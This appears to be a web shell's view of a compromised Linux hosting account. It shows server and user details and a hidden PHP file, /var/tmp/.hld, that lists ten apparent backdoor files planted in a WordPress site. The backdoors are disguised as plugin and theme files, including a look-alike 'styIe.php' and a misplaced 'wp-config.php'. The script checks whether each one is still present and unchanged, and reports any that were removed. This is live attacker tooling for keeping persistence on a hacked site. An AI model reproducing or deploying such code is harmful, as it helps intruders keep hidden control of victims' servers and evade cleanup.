HEX
Server: Apache
System: Linux iad1-shared-b7-40 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: dh_nk2zdt (5974180)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //var/tmp/.hld
<?php   $r = '/home/walwei3/utahra.org'; $x = ["/76de91.php"=>"bd@@16411@@105",
"/b3ff1b.php"=>"bd@@1179178@@226",
"/wp-content/plugins.hold/top_1748010550.php"=>"bd@@544829@@727",
"/wp-content/themes/universfolio/library/functions/shortcodes/class.prefs.php"=>"bd@@1401184@@413",
"/wp-content/plugins.hold/jetpack/modules/theme-tools/site.menu.php"=>"bd@@635248@@534",
"/wp-content/plugins.hold/wordpress-seo/admin/google_search_console/views/gsc.redirect.php"=>"bd@@707444@@221",
"/wp-content/themes/page-template-1748020256/styIe.php"=>"bd@@1279642@@727",
"/wp-content/plugins.hold/revslider/js/codemirror/pt_BR.php"=>"bd@@210331@@536",
"/wp-content/plugins.hold/jetpack/sal/class.json-api-site-jetpack-base.php"=>"bd@@556190@@6108",
"/wp-content/themes/author-template-1748030354/wp-config.php"=>"bd@@268028@@727"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');